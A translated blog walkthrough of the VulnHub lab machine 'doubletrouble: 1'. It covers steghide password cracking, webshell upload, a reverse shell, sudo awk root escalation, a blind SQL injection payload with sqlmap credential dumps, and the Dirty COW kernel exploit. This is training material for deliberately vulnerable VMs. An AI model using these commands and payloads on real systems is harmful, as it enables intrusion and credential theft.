laitimes
return

vulnhub刷题记录(doubletrouble: 1)

author:AILX10
vulnhub刷题记录(doubletrouble: 1)
  • 英文名称:doubletrouble: 1
  • Chinese name: Double troubles: 1
  • Published date: September 11, 2021
  • Difficulty: Easy
  • Description: About VM: Test and export from VirtualBox. Enable DHCP and nested VTX/AMDV. You can contact me via email for troubleshooting or questions.
  • Download: https://www.vulnhub.com/entry/empire-breakout,751/
vulnhub刷题记录(doubletrouble: 1)

AILX10

Excellent answerer in cybersecurity

Master's in Cybersecurity

Go to consult

1. Host discovery (192.168.199.107)

vulnhub刷题记录(doubletrouble: 1)

Host discovery

2. Port scanning, port 22 and port 80 are found

vulnhub刷题记录(doubletrouble: 1)

Port scanning

3. Visit the web page

vulnhub刷题记录(doubletrouble: 1)

4. Search for vulnerabilities in web components

vulnhub刷题记录(doubletrouble: 1)

Web component vulnerabilities

5. Discover the web directory 

┌──(ailx10㉿kali)-[~]
└─$ dirb http://192.168.199.107/       

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Aug 21 17:50:02 2022
URL_BASE: http://192.168.199.107/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          
                                  
+ http://192.168.199.107/favicon.ico (CODE:200|SIZE:894)                                                             
+ http://192.168.199.107/index.php (CODE:200|SIZE:5816)                                                                               
+ http://192.168.199.107/robots.txt (CODE:200|SIZE:26)                                                                       
+ http://192.168.199.107/server-status (CODE:403|SIZE:280)                                                                                                                                                      
+ http://192.168.199.107/install/index.php (CODE:200|SIZE:1815)                              
==> DIRECTORY: http://192.168.199.107/uploads/ 
==> DIRECTORY: http://192.168.199.107/backups/ 
==> DIRECTORY: http://192.168.199.107/secret/ 
...   
-----------------
END_TIME: Sun Aug 21 17:50:11 2022
DOWNLOADED: 9224 - FOUND: 5

6. Discover a secret document

vulnhub刷题记录(doubletrouble: 1)

clue

7. Try to extract the embedded information from the image 

steghide info doubletrouble.jpg
vulnhub刷题记录(doubletrouble: 1)

Try extracting the information from the picture

8. Use Stegseek to crack Steghide steganography data[1]

Stegseek is by far the fastest Steghide cracker in the world, and the tool is capable of processing millions of passwords per second.

It is worth mentioning that in just two seconds, the tool can run through rockyou.txt dictionary.

And as we all know, rockyou.txt is a powerful dictionary file that contains more than 14 million passwords.

─# wget https://github.com/RickdeJager/stegseek/releases/download/v0.6/stegseek_0.6-1.deb
┌──(root㉿kali)-[/home/ailx10/002]
└─# apt install ./stegseek_0.6-1.deb
┌──(root㉿kali)-[/home/ailx10/002]
└─# stegseek doubletrouble.jpg /usr/share/wordlists/rockyou.txt

I'm afraid I'm not afraid of it.

vulnhub刷题记录(doubletrouble: 1)

秒出密码:92camaro

9. Extract the embedded information in the picture again to get the email address and password 

┌──(root㉿kali)-[/home/ailx10/002]
└─# steghide info doubletrouble.jpg
┌──(root㉿kali)-[/home/ailx10/002]
└─# cat doubletrouble.jpg.out 
[email protected]
otis666
vulnhub刷题记录(doubletrouble: 1)

Get the web administrator password

10. Enter the web background and add user ailx10

vulnhub刷题记录(doubletrouble: 1)

Added user ailx10

11. Switch accounts, create projects, and upload webshells

vulnhub刷题记录(doubletrouble: 1)

Upload the webshell

12. Bounce shell

vulnhub刷题记录(doubletrouble: 1)

Bounce shell

13. Check sudo and find that the awk privilege command does not require a password

vulnhub刷题记录(doubletrouble: 1)

Upgrade root

14. Upgraded to root permission, I found another target machine, and it was really a sixth target 

sudo awk 'BEGIN {system("/bin/sh")}'
vulnhub刷题记录(doubletrouble: 1)

Meet the Sixth

15. NC download to the local computer 

服务端:
nc -lvp 4444 > ailx10_double_trouble.ova

客户端:
nc 192.168.199.247 4444 < doubletrouble.ova
vulnhub刷题记录(doubletrouble: 1)

Download the second OVA

16. Turn on the second target machine and repeat the infiltration process

vulnhub刷题记录(doubletrouble: 1)

The second target machine

17. The host found that there was one more IP: 192.168.199.171

vulnhub刷题记录(doubletrouble: 1)

Add an IP address: 192.168.199.171

18. Port scanning, ports 22 and 80 are found

vulnhub刷题记录(doubletrouble: 1)

Port scanning

19. Visit the web page

vulnhub刷题记录(doubletrouble: 1)

web pages

20. Try sqlmap injection 

---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=ailx10' AND (SELECT 8679 FROM (SELECT(SLEEP(5)))oZRk) AND 'IwOe'='IwOe&psw=123456&btnLogin=Login
---
vulnhub刷题记录(doubletrouble: 1)

Storage SQL injection vulnerability

21. Try to get the database name (doubletrouble) 

sqlmap -u "http://192.168.199.171/index.php" --data="uname=ailx10&psw=123456&btnLogin=Login" --current-db
vulnhub刷题记录(doubletrouble: 1)

The name of the database

22. Try to get the table name (users) 

sqlmap -u "http://192.168.199.171/index.php" --data="uname=ailx10&psw=123456&btnLogin=Login" -D doubletrouble --tables
vulnhub刷题记录(doubletrouble: 1)

Table Name

23、尝试获得字段名称(username,password) 

sqlmap -u "http://192.168.199.171/index.php" --data="uname=ailx10&psw=123456&btnLogin=Login" -D doubletrouble -T users --columns
vulnhub刷题记录(doubletrouble: 1)

The name of the field

24. Try to get the contents of the fields in the table 

sqlmap -u "http://192.168.199.171/index.php" --data="uname=ailx10&psw=123456&btnLogin=Login" -D doubletrouble -T users -C username,password --dump

Database: doubletrouble
Table: users
[2 entries]
+----------+----------+
| username | password |
+----------+----------+
| montreux | GfsZxc1  |
| clapton  | ZubZub99 |
+----------+----------+
vulnhub刷题记录(doubletrouble: 1)

Field contents

25. Try to log in to SSH to get the flag of the common user

vulnhub刷题记录(doubletrouble: 1)

SSH login to get a normal flag

26. Obtain system information and try to find vulnerabilities

vulnhub刷题记录(doubletrouble: 1)

System Information

vulnhub刷题记录(doubletrouble: 1)

Elevated POC

27. Compile 45010 and find that the file is missing, so I have to go to the dirty cow[2]

Dirty Cow vulnerability (CVE-2016–5195), which affects earlier versions of Linux 
Centos7/RHEL7     3.10.0-327.36.3.el7
Cetnos6/RHEL6     2.6.32-642.6.2.el6
Ubuntu 16.10      4.8.0-26.28
Ubuntu 16.04      4.4.0-45.66
Ubuntu 14.04      3.13.0-100.147
Debian 8          3.16.36-1+deb8u2
Debian 7          3.2.82-1

Specifically, the vulnerability is due to the fact that get_user_page kernel function may generate a race condition during the process of processing Copy-on-Write, causing the COW process to be corrupted, resulting in the opportunity to write data to the read-only memory area in the process address space.

Modify the su or passwd program to achieve the purpose of root.

clapton@doubletrouble:~$ ls
45010.c  dirty.c  user.txt
clapton@doubletrouble:~$ gcc -pthread dirty.c -o dirty -lcrypt
clapton@doubletrouble:~$ ls
45010.c  dirty	dirty.c  user.txt
clapton@doubletrouble:~$ ./dirty ailx10
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: ailx10
Complete line:
firefart:fimjbZU2MTUTY:0:0:pwned:/root:/bin/bash

mmap: 7f49735fb000

28. Upgrade rights and get the flag of root

vulnhub刷题记录(doubletrouble: 1)

Get the flag of root

At this point, the experiment is complete~

reference

  1. ^stegseek https://github.com/RickdeJager/stegseek/releases
  2. ^Dirty Cow https://github.com/firefart/dirtycow

Edited on 2022-08-21 21:08

Previous: Vulnhub刷题记录 (BEELZEBUB: 1)
Next: Vulnhub刷题记录 (Shipping Blues: 1)